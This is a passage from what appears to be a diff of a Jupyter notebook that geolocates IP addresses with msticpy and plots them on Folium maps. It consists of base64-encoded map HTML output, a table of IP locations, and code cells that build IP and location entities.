JTtoZWlnaHQ6IDEwMCU7bWFyZ2luOiAwO3BhZGRpbmc6IDA7fTwvc3R5bGU+CiAgICA8c3R5bGU+I21hcCB7cG9zaXRpb246YWJzb2x1dGU7dG9wOjA7Ym90dG9tOjA7cmlnaHQ6MDtsZWZ0OjA7fTwvc3R5bGU+CiAgICAKICAgICAgICAgICAgPG1ldGEgbmFtZT0idmlld3BvcnQiIGNvbnRlbnQ9IndpZHRoPWRldmljZS13aWR0aCwKICAgICAgICAgICAgICAgIGluaXRpYWwtc2NhbGU9MS4wLCBtYXhpbXVtLXNjYWxlPTEuMCwgdXNlci1zY2FsYWJsZT1ubyIgLz4KICAgICAgICAgICAgPHN0eWxlPgogICAgICAgICAgICAgICAgI21hcF8xNTMzNWU4M2JiNDY0MmFmYTdjZDVlODQyNTIxYWI4MCB7CiAgICAgICAgICAgICAgICAgICAgcG9zaXRpb246IHJlbGF0aXZlOwogICAgICAgICAgICAgICAgICAgIHdpZHRoOiAxMDAuMCU7CiAgICAgICAgICAgICAgICAgICAgaGVpZ2h0OiAxMDAuMCU7CiAgICAgICAgICAgICAgICAgICAgbGVmdDogMC4wJTsKICAgICAgICAgICAgICAgICAgICB0b3A6IDAuMCU7CiAgICAgICAgICAgICAgICB9CiAgICAgICAgICAgIDwvc3R5bGU+CiAgICAgICAgCjwvaGVhZD4KPGJvZHk+ICAgIAogICAgCiAgICAgICAgICAgIDxkaXYgY2xhc3M9ImZvbGl1bS1tYXAiIGlkPSJtYXBfMTUzMzVlODNiYjQ2NDJhZmE3Y2Q1ZTg0MjUyMWFiODAiID48L2Rpdj4KICAgICAgICAKPC9ib2R5Pgo8c2NyaXB0PiAgICAKICAgIAogICAgICAgICAgICB2YXIgbWFwXzE1MzM1ZTgzYmI0NjQyYWZhN2NkNWU4NDI1MjFhYjgwID0gTC5tYXAoCiAgICAgICAgICAgICAgICAibWFwXzE1MzM1ZTgzYmI0NjQyYWZhN2NkNWU4NDI1MjFhYjgwIiwKICAgICAgICAgICAgICAgIHsKICAgICAgICAgICAgICAgICAgICBjZW50ZXI6IFszNy43Njc4NDg5Njg1MDU4NiwgLTEyMi4zOTI4NjA0MTI1OTc2Nl0sCiAgICAgICAgICAgICAgICAgICAgY3JzOiBMLkNSUy5FUFNHMzg1NywKICAgICAgICAgICAgICAgICAgICB6b29tOiA5LAogICAgICAgICAgICAgICAgICAgIHpvb21Db250cm9sOiB0cnVlLAogICAgICAgICAgICAgICAgICAgIHByZWZlckNhbnZhczogZmFsc2UsCiAgICAgICAgICAgICAgICB9CiAgICAgICAgICAgICk7CgogICAgICAgICAgICAKCiAgICAgICAgCiAgICAKICAgICAgICAgICAgdmFyIHRpbGVfbGF5ZXJfNDlmZjdmMjhmZWRiNDAyMjhlN2M3NTcyNTQxYzg5NTEgPSBMLnRpbGVMYXllcigKICAgICAgICAgICAgICAgICJodHRwczovL3tzfS50aWxlLm9wZW5zdHJlZXRtYXAub3JnL3t6fS97eH0ve3l9LnBuZyIsCiAgICAgICAgICAgICAgICB7ImF0dHJpYnV0aW9uIjogIkRhdGEgYnkgXHUwMDI2Y29weTsgXHUwMDNjYSBocmVmPVwiaHR0cDovL29wZW5zdHJlZXRtYXAub3JnXCJcdTAwM2VPcGVuU3RyZWV0TWFwXHUwMDNjL2FcdTAwM2UsIHVuZGVyIFx1MDAzY2EgaHJlZj1cImh0dHA6Ly93d3cub3BlbnN0cmVldG1hcC5vcmcvY29weXJpZ2h0XCJcdTAwM2VPRGJMXHUwMDNjL2FcdTAwM2UuIiwgImRldGVjdFJldGluYSI6IGZhbHNlLCAibWF4TmF0aXZlWm9vbSI6IDE4LCAibWF4Wm9vbSI6IDE4LCAibWluWm9vbSI6IDAsICJub1dyYXAiOiBmYWxzZSwgIm9wYWNpdHkiOiAxLCAic3ViZG9tYWlucyI6ICJhYmMiLCAidG1zIjogZmFsc2V9CiAgICAgICAgICAgICkuYWRkVG8obWFwXzE1MzM1ZTgzYmI0NjQyYWZhN2NkNWU4NDI1MjFhYjgwKTsKICAgICAgICAKICAgIAogICAgICAgICAgICB2YXIgbWFya2VyX2VmNDkzNjI5YmExZTQ5ZTVhNjRiNTlmNjQ3ZTQzNWQ0ID0gTC5tYXJrZXIoCiAgICAgICAgICAgICAgICBbMzcuNzY3ODQ4OTY4NTA1ODYsIC0xMjIuMzkyODYwNDEyNTk3NjZdLAogICAgICAgICAgICAgICAge30KICAgICAgICAgICAgKS5hZGRUbyhtYXBfMTUzMzVlODNiYjQ2NDJhZmE3Y2Q1ZTg0MjUyMWFiODApOwogICAgICAgIAogICAgCiAgICAgICAgICAgIHZhciBpY29uXzc1ZmYwMTllNjZlNDQ3NzVhZjQ5NzRhZjFiN2IzYjdkID0gTC5Bd2Vzb21lTWFya2Vycy5pY29uKAogICAgICAgICAgICAgICAgeyJleHRyYUNsYXNzZXMiOiAiZmEtcm90YXRlLTAiLCAiaWNvbiI6ICJpbmZvLXNpZ24iLCAiaWNvbkNvbG9yIjogIndoaXRlIiwgIm1hcmtlckNvbG9yIjogIm9yYW5nZSIsICJwcmVmaXgiOiAiZ2x5cGhpY29uIn0KICAgICAgICAgICAgKTsKICAgICAgICAgICAgbWFya2VyX2VmNDkzNjI5YmExZTQ5ZTVhNjRiNTlmNjQ3ZTQzNWQ0LnNldEljb24oaWNvbl83NWZmMDE5ZTY2ZTQ0Nzc1YWY0OTc0YWYxYjdiM2I3ZCk7CiAgICAgICAgCiAgICAKICAgICAgICB2YXIgcG9wdXBfYzc5MGVjMzMwNzMwNDgwOTgyNWUyNzkwY2Q5MWU1MjYgPSBMLnBvcHVwKHsibWF4V2lkdGgiOiAiMTAwJSJ9KTsKCiAgICAgICAgCiAgICAgICAgICAgIHZhciBodG1sX2M4NDViMGJlODIyMTQxNmJiYjJiN2E3ZmJlNGVhNTkwID0gJChgPGRpdiBpZD0iaHRtbF9jODQ1YjBiZTgyMjE0MTZiYmIyYjdhN2ZiZTRlYTU5MCIgc3R5bGU9IndpZHRoOiAxMDAuMCU7IGhlaWdodDogMTAwLjAlOyI+Q291bnRyeUNvZGU9VVMsIENvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMsIFN0YXRlPUNhbGlmb3JuaWEsIENpdHk9U2FuIEZyYW5jaXNjbywgTG9uZ2l0dWRlPS0xMjIuMzkyODYwNDEyNTk3NjYsIExhdGl0dWRlPTM3Ljc2Nzg0ODk2ODUwNTg2LCBUeXBlPWdlb2xvY2F0aW9uPGJyPklQOiAxNTEuMTAxLjE5Mi4yMjM8L2Rpdj5gKVswXTsKICAgICAgICAgICAgcG9wdXBfYzc5MGVjMzMwNzMwNDgwOTgyNWUyNzkwY2Q5MWU1MjYuc2V0Q29udGVudChodG1sX2M4NDViMGJlODIyMTQxNmJiYjJiN2E3ZmJlNGVhNTkwKTsKICAgICAgICAKCiAgICAgICAgbWFya2VyX2VmNDkzNjI5YmExZTQ5ZTVhNjRiNTlmNjQ3ZTQzNWQ0LmJpbmRQb3B1cChwb3B1cF9jNzkwZWMzMzA3MzA0ODA5ODI1ZTI3OTBjZDkxZTUyNikKICAgICAgICA7CgogICAgICAgIAogICAgCiAgICAKICAgICAgICAgICAgbWFya2VyX2VmNDkzNjI5YmExZTQ5ZTVhNjRiNTlmNjQ3ZTQzNWQ0LmJpbmRUb29sdGlwKAogICAgICAgICAgICAgICAgYDxkaXY+CiAgICAgICAgICAgICAgICAgICAgIFNhbiBGcmFuY2lzY28sIFVuaXRlZCBTdGF0ZXMKICAgICAgICAgICAgICAgICA8L2Rpdj5gLAogICAgICAgICAgICAgICAgeyJzdGlja3kiOiB0cnVlfQogICAgICAgICAgICApOwogICAgICAgIAogICAgCiAgICAgICAgICAgIHZhciBtYXJrZXJfZWYxMWNmMDE5M2M3NDNkNGFlYTU2YWRhYTE5MTE4NTUgPSBMLm1hcmtlcigKICAgICAgICAgICAgICAgIFszNy43Njc4NDg5Njg1MDU4NiwgLTEyMi4zOTI4NjA0MTI1OTc2Nl0sCiAgICAgICAgICAgICAgICB7fQogICAgICAgICAgICApLmFkZFRvKG1hcF8xNTMzNWU4M2JiNDY0MmFmYTdjZDVlODQyNTIxYWI4MCk7CiAgICAgICAgCiAgICAKICAgICAgICAgICAgdmFyIGljb25fZWZhYWZiYjQxM2I3NDc3MmIwOWYyODRlNWI5ZjEyNmUgPSBMLkF3ZXNvbWVNYXJrZXJzLmljb24oCiAgICAgICAgICAgICAgICB7ImV4dHJhQ2xhc3NlcyI6ICJmYS1yb3RhdGUtMCIsICJpY29uIjogImluZm8tc2lnbiIsICJpY29uQ29sb3IiOiAid2hpdGUiLCAibWFya2VyQ29sb3IiOiAib3JhbmdlIiwgInByZWZpeCI6ICJnbHlwaGljb24ifQogICAgICAgICAgICApOwogICAgICAgICAgICBtYXJrZXJfZWYxMWNmMDE5M2M3NDNkNGFlYTU2YWRhYTE5MTE4NTUuc2V0SWNvbihpY29uX2VmYWFmYmI0MTNiNzQ3NzJiMDlmMjg0ZTViOWYxMjZlKTsKICAgICAgICAKICAgIAogICAgICAgIHZhciBwb3B1cF8yYzRhMmVhMGYwNTY0ZWNkYmJjMzgyZmUwM2ZiMWNjMiA9IEwucG9wdXAoeyJtYXhXaWR0aCI6ICIxMDAlIn0pOwoKICAgICAgICAKICAgICAgICAgICAgdmFyIGh0bWxfMDVjY2RmMTZkOTFhNDIwZmI5MzQ1MjJhNjFjMjhlYTggPSAkKGA8ZGl2IGlkPSJodG1sXzA1Y2NkZjE2ZDkxYTQyMGZiOTM0NTIyYTYxYzI4ZWE4IiBzdHlsZT0id2lkdGg6IDEwMC4wJTsgaGVpZ2h0OiAxMDAuMCU7Ij5Db3VudHJ5Q29kZT1VUywgQ291bnRyeU5hbWU9VW5pdGVkIFN0YXRlcywgU3RhdGU9Q2FsaWZvcm5pYSwgQ2l0eT1TYW4gRnJhbmNpc2NvLCBMb25naXR1ZGU9LTEyMi4zOTI4NjA0MTI1OTc2NiwgTGF0aXR1ZGU9MzcuNzY3ODQ4OTY4NTA1ODYsIFR5cGU9Z2VvbG9jYXRpb248YnI+SVA6IDE1MS4xMDEuNjQuMjIzPC9kaXY+YClbMF07CiAgICAgICAgICAgIHBvcHVwXzJjNGEyZWEwZjA1NjRlY2RiYmMzODJmZTAzZmIxY2MyLnNldENvbnRlbnQoaHRtbF8wNWNjZGYxNmQ5MWE0MjBmYjkzNDUyMmE2MWMyOGVhOCk7CiAgICAgICAgCgogICAgICAgIG1hcmtlcl9lZjExY2YwMTkzYzc0M2Q0YWVhNTZhZGFhMTkxMTg1NS5iaW5kUG9wdXAocG9wdXBfMmM0YTJlYTBmMDU2NGVjZGJiYzM4MmZlMDNmYjFjYzIpCiAgICAgICAgOwoKICAgICAgICAKICAgIAogICAgCiAgICAgICAgICAgIG1hcmtlcl9lZjExY2YwMTkzYzc0M2Q0YWVhNTZhZGFhMTkxMTg1NS5iaW5kVG9vbHRpcCgKICAgICAgICAgICAgICAgIGA8ZGl2PgogICAgICAgICAgICAgICAgICAgICBTYW4gRnJhbmNpc2NvLCBVbml0ZWQgU3RhdGVzCiAgICAgICAgICAgICAgICAgPC9kaXY+YCwKICAgICAgICAgICAgICAgIHsic3RpY2t5IjogdHJ1ZX0KICAgICAgICAgICAgKTsKICAgICAgICAKICAgIAogICAgICAgICAgICB2YXIgbWFya2VyXzI1NjRjNWM5YzE4MzRjMTY4YWM2ZWU3OTQ3YTg5YzZiID0gTC5tYXJrZXIoCiAgICAgICAgICAgICAgICBbMzcuNzY3ODQ4OTY4NTA1ODYsIC0xMjIuMzkyODYwNDEyNTk3NjZdLAogICAgICAgICAgICAgICAge30KICAgICAgICAgICAgKS5hZGRUbyhtYXBfMTUzMzVlODNiYjQ2NDJhZmE3Y2Q1ZTg0MjUyMWFiODApOwogICAgICAgIAogICAgCiAgICAgICAgICAgIHZhciBpY29uXzUyMGJjZDg2YmRhMjRlYmFhNmNlNzkyZTk0ZGRmNTY2ID0gTC5Bd2Vzb21lTWFya2Vycy5pY29uKAogICAgICAgICAgICAgICAgeyJleHRyYUNsYXNzZXMiOiAiZmEtcm90YXRlLTAiLCAiaWNvbiI6ICJpbmZvLXNpZ24iLCAiaWNvbkNvbG9yIjogIndoaXRlIiwgIm1hcmtlckNvbG9yIjogIm9yYW5nZSIsICJwcmVmaXgiOiAiZ2x5cGhpY29uIn0KICAgICAgICAgICAgKTsKICAgICAgICAgICAgbWFya2VyXzI1NjRjNWM5YzE4MzRjMTY4YWM2ZWU3OTQ3YTg5YzZiLnNldEljb24oaWNvbl81MjBiY2Q4NmJkYTI0ZWJhYTZjZTc5MmU5NGRkZjU2Nik7CiAgICAgICAgCiAgICAKICAgICAgICB2YXIgcG9wdXBfYTNkYjBjYmI3NWFkNDM3Zjg3MjRlZjZjNjI2MDAyNzYgPSBMLnBvcHVwKHsibWF4V2lkdGgiOiAiMTAwJSJ9KTsKCiAgICAgICAgCiAgICAgICAgICAgIHZhciBodG1sX2Y1Nzg5NjBiMjFmMTQxYjhhZmE3NGIwMjIyY2MxYTdkID0gJChgPGRpdiBpZD0iaHRtbF9mNTc4OTYwYjIxZjE0MWI4YWZhNzRiMDIyMmNjMWE3ZCIgc3R5bGU9IndpZHRoOiAxMDAuMCU7IGhlaWdodDogMTAwLjAlOyI+Q291bnRyeUNvZGU9VVMsIENvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMsIFN0YXRlPUNhbGlmb3JuaWEsIENpdHk9U2FuIEZyYW5jaXNjbywgTG9uZ2l0dWRlPS0xMjIuMzkyODYwNDEyNTk3NjYsIExhdGl0dWRlPTM3Ljc2Nzg0ODk2ODUwNTg2LCBUeXBlPWdlb2xvY2F0aW9uPGJyPklQOiAxNTEuMTAxLjAuMjIzPC9kaXY+YClbMF07CiAgICAgICAgICAgIHBvcHVwX2EzZGIwY2JiNzVhZDQzN2Y4NzI0ZWY2YzYyNjAwMjc2LnNldENvbnRlbnQoaHRtbF9mNTc4OTYwYjIxZjE0MWI4YWZhNzRiMDIyMmNjMWE3ZCk7CiAgICAgICAgCgogICAgICAgIG1hcmtlcl8yNTY0YzVjOWMxODM0YzE2OGFjNmVlNzk0N2E4OWM2Yi5iaW5kUG9wdXAocG9wdXBfYTNkYjBjYmI3NWFkNDM3Zjg3MjRlZjZjNjI2MDAyNzYpCiAgICAgICAgOwoKICAgICAgICAKICAgIAogICAgCiAgICAgICAgICAgIG1hcmtlcl8yNTY0YzVjOWMxODM0YzE2OGFjNmVlNzk0N2E4OWM2Yi5iaW5kVG9vbHRpcCgKICAgICAgICAgICAgICAgIGA8ZGl2PgogICAgICAgICAgICAgICAgICAgICBTYW4gRnJhbmNpc2NvLCBVbml0ZWQgU3RhdGVzCiAgICAgICAgICAgICAgICAgPC9kaXY+YCwKICAgICAgICAgICAgICAgIHsic3RpY2t5IjogdHJ1ZX0KICAgICAgICAgICAgKTsKICAgICAgICAKICAgIAogICAgICAgICAgICB2YXIgbWFya2VyXzA0YTEyZTM5MDRhMjQ1ZmQ4YzQ2YTA2YTI4NjU3YzUxID0gTC5tYXJrZXIoCiAgICAgICAgICAgICAgICBbMzcuNzY3ODQ4OTY4NTA1ODYsIC0xMjIuMzkyODYwNDEyNTk3NjZdLAogICAgICAgICAgICAgICAge30KICAgICAgICAgICAgKS5hZGRUbyhtYXBfMTUzMzVlODNiYjQ2NDJhZmE3Y2Q1ZTg0MjUyMWFiODApOwogICAgICAgIAogICAgCiAgICAgICAgICAgIHZhciBpY29uX2U1NjIxMzI3MjE1MDQ3M2Q4YjQ0YWVmMDY1ZWZiY2E4ID0gTC5Bd2Vzb21lTWFya2Vycy5pY29uKAogICAgICAgICAgICAgICAgeyJleHRyYUNsYXNzZXMiOiAiZmEtcm90YXRlLTAiLCAiaWNvbiI6ICJpbmZvLXNpZ24iLCAiaWNvbkNvbG9yIjogIndoaXRlIiwgIm1hcmtlckNvbG9yIjogIm9yYW5nZSIsICJwcmVmaXgiOiAiZ2x5cGhpY29uIn0KICAgICAgICAgICAgKTsKICAgICAgICAgICAgbWFya2VyXzA0YTEyZTM5MDRhMjQ1ZmQ4YzQ2YTA2YTI4NjU3YzUxLnNldEljb24oaWNvbl9lNTYyMTMyNzIxNTA0NzNkOGI0NGFlZjA2NWVmYmNhOCk7CiAgICAgICAgCiAgICAKICAgICAgICB2YXIgcG9wdXBfYWQ0YWM4ZWMwYTBjNDdlYWIxNWE1YjE0MWI1ZWI5OTIgPSBMLnBvcHVwKHsibWF4V2lkdGgiOiAiMTAwJSJ9KTsKCiAgICAgICAgCiAgICAgICAgICAgIHZhciBodG1sX2I2NGI1YzE1YzdiNDQ5MmI5YTVhMjZiZTJhMzc2OGYwID0gJChgPGRpdiBpZD0iaHRtbF9iNjRiNWMxNWM3YjQ0OTJiOWE1YTI2YmUyYTM3NjhmMCIgc3R5bGU9IndpZHRoOiAxMDAuMCU7IGhlaWdodDogMTAwLjAlOyI+Q291bnRyeUNvZGU9VVMsIENvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMsIFN0YXRlPUNhbGlmb3JuaWEsIENpdHk9U2FuIEZyYW5jaXNjbywgTG9uZ2l0dWRlPS0xMjIuMzkyODYwNDEyNTk3NjYsIExhdGl0dWRlPTM3Ljc2Nzg0ODk2ODUwNTg2LCBUeXBlPWdlb2xvY2F0aW9uPGJyPklQOiAxNTEuMTAxLjEyOC4yMjM8L2Rpdj5gKVswXTsKICAgICAgICAgICAgcG9wdXBfYWQ0YWM4ZWMwYTBjNDdlYWIxNWE1YjE0MWI1ZWI5OTIuc2V0Q29udGVudChodG1sX2I2NGI1YzE1YzdiNDQ5MmI5YTVhMjZiZTJhMzc2OGYwKTsKICAgICAgICAKCiAgICAgICAgbWFya2VyXzA0YTEyZTM5MDRhMjQ1ZmQ4YzQ2YTA2YTI4NjU3YzUxLmJpbmRQb3B1cChwb3B1cF9hZDRhYzhlYzBhMGM0N2VhYjE1YTViMTQxYjVlYjk5MikKICAgICAgICA7CgogICAgICAgIAogICAgCiAgICAKICAgICAgICAgICAgbWFya2VyXzA0YTEyZTM5MDRhMjQ1ZmQ4YzQ2YTA2YTI4NjU3YzUxLmJpbmRUb29sdGlwKAogICAgICAgICAgICAgICAgYDxkaXY+CiAgICAgICAgICAgICAgICAgICAgIFNhbiBGcmFuY2lzY28sIFVuaXRlZCBTdGF0ZXMKICAgICAgICAgICAgICAgICA8L2Rpdj5gLAogICAgICAgICAgICAgICAgeyJzdGlja3kiOiB0cnVlfQogICAgICAgICAgICApOwogICAgICAgIAo8L3NjcmlwdD4= onload=\"this.contentDocument.open();this.contentDocument.write(atob(this.getAttribute('data-html')));this.contentDocument.close();\" allowfullscreen webkitallowfullscreen mozallowfullscreen></iframe></div></div>"
+      ],
+      "text/plain": [
+       "<msticpy.nbtools.foliummap.FoliumMap at 0x297d5d944c8>"
+      ]
+     },
+     "execution_count": 4,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "import pickle\n",
+    "with open(b\"data/ip_entities.pkl\", \"rb\") as fh:\n",
+    "    ip_entities = pickle.load(fh)\n",
+    "ip_entities = [ip for ip in ip_entities if ip.Location and ip.Location.Latitude]\n",
+    "\n",
+    "folium_map = FoliumMap(zoom_start=9)\n",
+    "folium_map.add_ip_cluster(ip_entities=ip_entities, color='orange')\n",
+    "folium_map.center_map()\n",
+    "folium_map"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 13,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2020-02-08T01:01:41.488150Z",
+     "start_time": "2020-02-08T01:01:41.465129Z"
+    }
+   },
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>AllExtIPs</th>\n",
+       "      <th>AdditionalData</th>\n",
+       "      <th>Type</th>\n",
+       "      <th>CountryCode</th>\n",
+       "      <th>CountryName</th>\n",
+       "      <th>State</th>\n",
+       "      <th>City</th>\n",
+       "      <th>Longitude</th>\n",
+       "      <th>Latitude</th>\n",
+       "      <th>IpAddress</th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>0</th>\n",
+       "      <td>65.55.44.109</td>\n",
+       "      <td>{}</td>\n",
+       "      <td>geolocation</td>\n",
+       "      <td>US</td>\n",
+       "      <td>United States</td>\n",
+       "      <td>Virginia</td>\n",
+       "      <td>Boydton</td>\n",
+       "      <td>-78.3750</td>\n",
+       "      <td>36.6534</td>\n",
+       "      <td>65.55.44.109</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>1</th>\n",
+       "      <td>13.71.172.128</td>\n",
+       "      <td>{}</td>\n",
+       "      <td>geolocation</td>\n",
+       "      <td>CA</td>\n",
+       "      <td>Canada</td>\n",
+       "      <td>Ontario</td>\n",
+       "      <td>Toronto</td>\n",
+       "      <td>-79.4195</td>\n",
+       "      <td>43.6644</td>\n",
+       "      <td>13.71.172.128</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>2</th>\n",
+       "      <td>13.71.172.130</td>\n",
+       "      <td>{}</td>\n",
+       "      <td>geolocation</td>\n",
+       "      <td>CA</td>\n",
+       "      <td>Canada</td>\n",
+       "      <td>Ontario</td>\n",
+       "      <td>Toronto</td>\n",
+       "      <td>-79.4195</td>\n",
+       "      <td>43.6644</td>\n",
+       "      <td>13.71.172.130</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>3</th>\n",
+       "      <td>40.124.45.19</td>\n",
+       "      <td>{}</td>\n",
+       "      <td>geolocation</td>\n",
+       "      <td>US</td>\n",
+       "      <td>United States</td>\n",
+       "      <td>Texas</td>\n",
+       "      <td>San Antonio</td>\n",
+       "      <td>-98.4935</td>\n",
+       "      <td>29.4247</td>\n",
+       "      <td>40.124.45.19</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>4</th>\n",
+       "      <td>104.43.212.12</td>\n",
+       "      <td>{}</td>\n",
+       "      <td>geolocation</td>\n",
+       "      <td>US</td>\n",
+       "      <td>United States</td>\n",
+       "      <td>Iowa</td>\n",
+       "      <td>Des Moines</td>\n",
+       "      <td>-93.6112</td>\n",
+       "      <td>41.6006</td>\n",
+       "      <td>104.43.212.12</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "</div>"
+      ],
+      "text/plain": [
+       "       AllExtIPs AdditionalData         Type CountryCode    CountryName  \\\n",
+       "0   65.55.44.109             {}  geolocation          US  United States   \n",
+       "1  13.71.172.128             {}  geolocation          CA         Canada   \n",
+       "2  13.71.172.130             {}  geolocation          CA         Canada   \n",
+       "3   40.124.45.19             {}  geolocation          US  United States   \n",
+       "4  104.43.212.12             {}  geolocation          US  United States   \n",
+       "\n",
+       "      State         City  Longitude  Latitude      IpAddress  \n",
+       "0  Virginia      Boydton   -78.3750   36.6534   65.55.44.109  \n",
+       "1   Ontario      Toronto   -79.4195   43.6644  13.71.172.128  \n",
+       "2   Ontario      Toronto   -79.4195   43.6644  13.71.172.130  \n",
+       "3     Texas  San Antonio   -98.4935   29.4247   40.124.45.19  \n",
+       "4      Iowa   Des Moines   -93.6112   41.6006  104.43.212.12  "
+      ]
+     },
+     "execution_count": 13,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "# Read in some data\n",
+    "geo_loc_df = pd.read_csv(\"data/ip_locs.csv\", index_col=0)\n",
+    "geo_loc_df.head()"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 14,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2020-02-08T01:01:41.548161Z",
+     "start_time": "2020-02-08T01:01:41.489152Z"
+    }
+   },
+   "outputs": [
+    {
+     "data": {
+      "text/plain": [
+       "[IpAddress(Address=65.55.44.109, Location={ 'AdditionalData': {},\n",
+       "   'City': 'Boydton',\n",
+       "   'C...),\n",
+       " IpAddress(Address=13.71.172.128, Location={ 'AdditionalData': {},\n",
+       "   'City': 'Toronto',\n",
+       "   '...),\n",
+       " IpAddress(Address=13.71.172.130, Location={ 'AdditionalData': {},\n",
+       "   'City': 'Toronto',\n",
+       "   '...),\n",
+       " IpAddress(Address=40.124.45.19, Location={ 'AdditionalData': {},\n",
+       "   'City': 'San Antonio',\n",
+       " ...),\n",
+       " IpAddress(Address=104.43.212.12, Location={ 'AdditionalData': {},\n",
+       "   'City': 'Des Moines',\n",
+       " ...)]"
+      ]
+     },
+     "execution_count": 14,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "# Create IP and GeoLocation Entities from the dataframe\n",
+    "def create_ip_entity(row):\n",
+    "    ip_ent = IpAddress(Address=row[\"AllExtIPs\"])\n",
+    "    geo_loc = create_geo_entity(row)\n",
+    "    ip_ent.Location = geo_loc\n",
+    "    return ip_ent\n",
+    "\n",
+    "def create_geo_entity(row):\n",
+    "    # get subset of fields for GeoLocation\n",
+    "    loc_props = row[[\"CountryCode\", \"CountryName\",\"State\", \"City\", \"Longitude\", \"Latitude\"]]\n",
+    "    geo_loc = GeoLocation(**loc_props.to_dict())\n",
+    "    return geo_loc\n",
+    "\n",
+    "geo_locs = list(geo_loc_df.apply(create_geo_entity, axis=1).values)\n",
+    "ip_ents = list(geo_loc_df.apply(create_ip_entity, axis=1).values)\n",
+    "ip_ents[:5]"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 15,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2020-02-08T01:26:09.269390Z",
+     "start_time": "2020-02-08T01:26:09.261435Z"
+    }
+   },
+   "outputs": [
+    {
+     "data": {
+      "text/plain": [
+       "array([(36.6534, -78.375), (43.6644, -79.4195), (43.6644, -79.4195),\n",
+       "       (29.4247, -98.4935), (41.6006, -93.6112), (41.1399, -104.8193),\n",
+       "       (36.6534, -78.375), (43.6644, -79.4195), (38.7095, -78.1539),\n",
+       "       (38.7095, -78.1539), (36.6534, -78.375), (47.6742, -122.1243),\n",
+       "       (38.7095, -78.1539), (53.3338, -6.2488), (29.4247, -98.4935),\n",
+       "       (41.6006, -93.6112), (41.6006, -93.6112), (41.6006, -93.6112),\n",
+       "       (38.7095, -78.1539), (36.6534, -78.375), (36.6534, -78.375),\n",
+       "       (37.3388, -121.8914), (37.3388, -121.8914), (38.7095, -78.1539),\n",
+       "       (38.7095, -78.1539), (38.7095, -78.1539), (38.7095, -78.1539),\n",
+       "       (38.7095, -78.1539), (38.7095, -78.1539), (38.7095, -78.1539),\n",
+       "       (53.3338, -6.2488), (41.6006, -93.6112), (38.7095, -78.1539),\n",
+       "       (38.7095, -78.1539), (38.7095, -78.1539), (36.6534, -78.375),\n",
+       "       (38.7095, -78.1539), (41.6006, -93.6112), (41.6006, -93.6112),\n",
+       "       (41.6006, -93.6112), (38.7095, -78.1539), (37.3388, -121.8914),\n",
+       "       (37.3388, -121.8914), (38.7095, -78.1539), (41.6006, -93.6112),\n",
+       "       (40.4953, -111.9439), (41.6006, -93.6112), (41.6006, -93.6112),\n",
+       "       (36.6534, -78.375), (38.7095, -78.1539), (38.7095, -78.1539)],\n",
+       "      dtype=object)"
+      ]
+     },
+     "execution_count": 15,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "geo_loc_df.apply(lambda x: (x.Latitude, x.Longitude), axis=1).values"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "### Plot IPAddress entities with location data"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 16,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2020-02-08T01:01:41.607128Z",
+     "start_time": "2020-02-08T01:01:41.550160Z"
+    },
+    "scrolled": true
+   },
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "<div style=\"width:100%;\"><div style=\"position:relative;width:100%;height:0;padding-bottom:60%;\"><span style=\"color:#565656\">Make this Notebook Trusted to load map: File -> Trust Notebook</span><iframe src=\"about:blank\" style=\"position:absolute;width:100%;height:100%;left:0;top:0;border:none !important;\" 